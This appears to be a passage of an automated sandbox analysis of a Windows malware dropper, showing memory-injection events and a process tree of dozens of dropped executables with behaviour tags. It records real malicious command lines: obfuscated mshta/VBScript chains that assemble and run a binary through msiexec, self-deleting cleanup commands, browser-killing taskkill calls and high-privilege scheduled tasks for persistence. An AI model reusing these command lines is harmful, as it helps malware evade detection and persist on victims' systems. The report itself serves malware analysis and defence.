Fri051e1e7444.exeTrvPKMajtMffCi7iitJBZDnB.exeomVlxP3RfKIM3eS4IizTb8IP.exedescription pid process target process PID 692 wrote to memory of 1808 692 Fri051e1e7444.exe AgGOSclM3apmo74sb5reIH3y.exe PID 692 wrote to memory of 1808 692 Fri051e1e7444.exe AgGOSclM3apmo74sb5reIH3y.exe PID 692 wrote to memory of 2076 692 Fri051e1e7444.exe LYOsEH3xUWPTG6qnvscLPweb.exe PID 692 wrote to memory of 2076 692 Fri051e1e7444.exe LYOsEH3xUWPTG6qnvscLPweb.exe PID 692 wrote to memory of 1184 692 Fri051e1e7444.exe nHvwzSVZB5C_2lNYpayO6xbN.exe PID 692 wrote to memory of 1184 692 Fri051e1e7444.exe nHvwzSVZB5C_2lNYpayO6xbN.exe PID 692 wrote to memory of 1184 692 Fri051e1e7444.exe nHvwzSVZB5C_2lNYpayO6xbN.exe PID 692 wrote to memory of 1396 692 Fri051e1e7444.exe _g7tmzcXIP_JNr02UultIUME.exe PID 692 wrote to memory of 1396 692 Fri051e1e7444.exe _g7tmzcXIP_JNr02UultIUME.exe PID 692 wrote to memory of 1396 692 Fri051e1e7444.exe _g7tmzcXIP_JNr02UultIUME.exe PID 692 wrote to memory of 2520 692 Fri051e1e7444.exe e6WeCqUpNWJV6aPgszJeX9E0.exe PID 692 wrote to memory of 2520 692 Fri051e1e7444.exe e6WeCqUpNWJV6aPgszJeX9E0.exe PID 692 wrote to memory of 2520 692 Fri051e1e7444.exe e6WeCqUpNWJV6aPgszJeX9E0.exe PID 692 wrote to memory of 2404 692 Fri051e1e7444.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 692 wrote to memory of 2404 692 Fri051e1e7444.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 692 wrote to memory of 2404 692 Fri051e1e7444.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 692 wrote to memory of 1892 692 Fri051e1e7444.exe W1bYeEIYUUPaZDtUMFaYTrWG.exe PID 692 wrote to memory of 1892 692 Fri051e1e7444.exe W1bYeEIYUUPaZDtUMFaYTrWG.exe PID 692 wrote to memory of 1892 692 Fri051e1e7444.exe W1bYeEIYUUPaZDtUMFaYTrWG.exe PID 692 wrote to memory of 2184 692 Fri051e1e7444.exe IU5rmCoRAx2aHgjhPh2xdpHv.exe PID 692 wrote to memory of 2184 692 Fri051e1e7444.exe IU5rmCoRAx2aHgjhPh2xdpHv.exe PID 692 wrote to memory of 2184 692 Fri051e1e7444.exe IU5rmCoRAx2aHgjhPh2xdpHv.exe PID 692 wrote to memory of 1228 692 Fri051e1e7444.exe 6OMebL7JbPas8BcXIUNnfFcX.exe PID 692 wrote to memory of 1228 692 Fri051e1e7444.exe 6OMebL7JbPas8BcXIUNnfFcX.exe PID 692 wrote to memory of 1228 692 Fri051e1e7444.exe 6OMebL7JbPas8BcXIUNnfFcX.exe PID 692 wrote to memory of 2120 692 Fri051e1e7444.exe JFXVqZOn7ssgWpUgV2CUaIij.exe PID 692 wrote to memory of 2120 692 Fri051e1e7444.exe JFXVqZOn7ssgWpUgV2CUaIij.exe PID 692 wrote to memory of 2120 692 Fri051e1e7444.exe JFXVqZOn7ssgWpUgV2CUaIij.exe PID 692 wrote to memory of 2060 692 Fri051e1e7444.exe OerARSDN8_Y6xtKjAv9ItJbN.exe PID 692 wrote to memory of 2060 692 Fri051e1e7444.exe OerARSDN8_Y6xtKjAv9ItJbN.exe PID 692 wrote to memory of 2060 692 Fri051e1e7444.exe OerARSDN8_Y6xtKjAv9ItJbN.exe PID 692 wrote to memory of 3724 692 Fri051e1e7444.exe aj1qRBbUcTuprnRCEvZjOudA.exe PID 692 wrote to memory of 3724 692 Fri051e1e7444.exe aj1qRBbUcTuprnRCEvZjOudA.exe PID 692 wrote to memory of 3724 692 Fri051e1e7444.exe aj1qRBbUcTuprnRCEvZjOudA.exe PID 692 wrote to memory of 3960 692 Fri051e1e7444.exe VEa4XNX37VROBVrK80k5VxkO.exe PID 692 wrote to memory of 3960 692 Fri051e1e7444.exe VEa4XNX37VROBVrK80k5VxkO.exe PID 692 wrote to memory of 3960 692 Fri051e1e7444.exe VEa4XNX37VROBVrK80k5VxkO.exe PID 692 wrote to memory of 1952 692 Fri051e1e7444.exe RD8KFq6f5QViwV0MrTou3rpZ.exe PID 692 wrote to memory of 1952 692 Fri051e1e7444.exe RD8KFq6f5QViwV0MrTou3rpZ.exe PID 692 wrote to memory of 1952 692 Fri051e1e7444.exe RD8KFq6f5QViwV0MrTou3rpZ.exe PID 692 wrote to memory of 3532 692 Fri051e1e7444.exe omVlxP3RfKIM3eS4IizTb8IP.exe PID 692 wrote to memory of 3532 692 Fri051e1e7444.exe omVlxP3RfKIM3eS4IizTb8IP.exe PID 692 wrote to memory of 3532 692 Fri051e1e7444.exe omVlxP3RfKIM3eS4IizTb8IP.exe PID 692 wrote to memory of 3608 692 Fri051e1e7444.exe AecmysbzIXMVq1dRFsqTK8lb.exe PID 692 wrote to memory of 3608 692 Fri051e1e7444.exe AecmysbzIXMVq1dRFsqTK8lb.exe PID 692 wrote to memory of 1784 692 Fri051e1e7444.exe r3FYzQQodjD253E15m9ZD5ze.exe PID 692 wrote to memory of 1784 692 Fri051e1e7444.exe r3FYzQQodjD253E15m9ZD5ze.exe PID 692 wrote to memory of 1784 692 Fri051e1e7444.exe r3FYzQQodjD253E15m9ZD5ze.exe PID 692 wrote to memory of 1632 692 Fri051e1e7444.exe fEbcFuzCW9Be1RqlDsqMbCAi.exe PID 692 wrote to memory of 1632 692 Fri051e1e7444.exe fEbcFuzCW9Be1RqlDsqMbCAi.exe PID 692 wrote to memory of 1632 692 Fri051e1e7444.exe fEbcFuzCW9Be1RqlDsqMbCAi.exe PID 692 wrote to memory of 2732 692 Fri051e1e7444.exe Y7B85KyvjK4STp4RCLBO190o.exe PID 692 wrote to memory of 2732 692 Fri051e1e7444.exe Y7B85KyvjK4STp4RCLBO190o.exe PID 692 wrote to memory of 2732 692 Fri051e1e7444.exe Y7B85KyvjK4STp4RCLBO190o.exe PID 692 wrote to memory of 680 692 Fri051e1e7444.exe GmsDXcf5_0hLpT8X9au5MwZp.exe PID 692 wrote to memory of 680 692 Fri051e1e7444.exe GmsDXcf5_0hLpT8X9au5MwZp.exe PID 692 wrote to memory of 680 692 Fri051e1e7444.exe GmsDXcf5_0hLpT8X9au5MwZp.exe PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 3532 wrote to memory of 588 3532 omVlxP3RfKIM3eS4IizTb8IP.exe omVlxP3RfKIM3eS4IizTb8IP.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\AgGOSclM3apmo74sb5reIH3y.exe"C:\Users\Admin\Pictures\Adobe Films\AgGOSclM3apmo74sb5reIH3y.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\LYOsEH3xUWPTG6qnvscLPweb.exe"C:\Users\Admin\Pictures\Adobe Films\LYOsEH3xUWPTG6qnvscLPweb.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\e6WeCqUpNWJV6aPgszJeX9E0.exe"C:\Users\Admin\Pictures\Adobe Films\e6WeCqUpNWJV6aPgszJeX9E0.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\6gLgVHK4S6fRDlTOaK71bGb9.exe"C:\Users\Admin\Documents\6gLgVHK4S6fRDlTOaK71bGb9.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\MS7ss0t3Z_BgNm5vQL0FhEFR.exe"C:\Users\Admin\Pictures\Adobe Films\MS7ss0t3Z_BgNm5vQL0FhEFR.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\r8MBUoHvcWqO6aNLC5f23A0S.exe"C:\Users\Admin\Pictures\Adobe Films\r8MBUoHvcWqO6aNLC5f23A0S.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\zObJUR9EVjyfYx_qv35UyzNe.exe"C:\Users\Admin\Pictures\Adobe Films\zObJUR9EVjyfYx_qv35UyzNe.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "z43qKkeelVhYZeo9SP_z8aeG.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\vupKshalYTqbBzAgIHkdBXKJ.exe"C:\Users\Admin\Pictures\Adobe Films\vupKshalYTqbBzAgIHkdBXKJ.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\OOEA7DkxfTRmQavkjfVnrAHD.exe"C:\Users\Admin\Pictures\Adobe Films\OOEA7DkxfTRmQavkjfVnrAHD.exe" /mixtwo4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6525⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6285⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 8845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 9325⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 11045⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\V4SCYlZHCcOHjngJbi971hMu.exe"C:\Users\Admin\Pictures\Adobe Films\V4SCYlZHCcOHjngJbi971hMu.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x208,0x7ffd78ebdec0,0x7ffd78ebded0,0x7ffd78ebdee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff7359f9e70,0x7ff7359f9e80,0x7ff7359f9e908⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1756,16477206392915712665,5483262561208560081,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4764_1068618917" --mojo-platform-channel-handle=1772 /prefetch:87⤵
-
C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe"C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-206C2.tmp\f7VAnYD0ZMCm46C7pv9aNPyZ.tmp"C:\Users\Admin\AppData\Local\Temp\is-206C2.tmp\f7VAnYD0ZMCm46C7pv9aNPyZ.tmp" /SL5="$102B6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-UN73N.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-UN73N.tmp\DYbALA.exe" /S /UID=27096⤵
-
C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe"C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\9f-84861-34c-5eb98-6fa51d5519593\ZHalijicaeshe.exe"C:\Users\Admin\AppData\Local\Temp\9f-84861-34c-5eb98-6fa51d5519593\ZHalijicaeshe.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\c1-5041e-a38-502b5-86535f2727b89\SHumokyhefi.exe"C:\Users\Admin\AppData\Local\Temp\c1-5041e-a38-502b5-86535f2727b89\SHumokyhefi.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exe /eufive9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 65210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 67210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 67610⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 58810⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exeC:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654211 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exeC:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 65210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 66810⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 67210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 66810⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 88410⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 109610⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe /verysilent & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exeC:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe /verysilent9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FastPC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe" & del C:\ProgramData\*.dll & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FastPC.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exe /S9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9104.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\nHvwzSVZB5C_2lNYpayO6xbN.exe"C:\Users\Admin\Pictures\Adobe Films\nHvwzSVZB5C_2lNYpayO6xbN.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\JFXVqZOn7ssgWpUgV2CUaIij.exe"C:\Users\Admin\Pictures\Adobe Films\JFXVqZOn7ssgWpUgV2CUaIij.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\OerARSDN8_Y6xtKjAv9ItJbN.exe"C:\Users\Admin\Pictures\Adobe Films\OerARSDN8_Y6xtKjAv9ItJbN.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe"C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 6OMebL7JbPas8BcXIUNnfFcX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 6OMebL7JbPas8BcXIUNnfFcX.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\IU5rmCoRAx2aHgjhPh2xdpHv.exe"C:\Users\Admin\Pictures\Adobe Films\IU5rmCoRAx2aHgjhPh2xdpHv.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\W1bYeEIYUUPaZDtUMFaYTrWG.exe"C:\Users\Admin\Pictures\Adobe Films\W1bYeEIYUUPaZDtUMFaYTrWG.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe"C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
